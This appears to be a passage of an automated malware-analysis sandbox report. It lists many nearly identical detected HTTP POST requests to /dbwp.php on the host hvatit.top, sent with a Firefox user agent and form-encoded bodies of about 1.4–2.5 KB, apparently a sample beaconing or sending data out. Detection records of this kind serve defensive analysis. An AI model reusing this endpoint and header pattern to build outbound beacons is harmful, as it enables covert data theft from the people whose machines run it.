                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2552Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2552Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1420Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2552Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1408Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2552Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2552Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2552Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1408Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2552Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
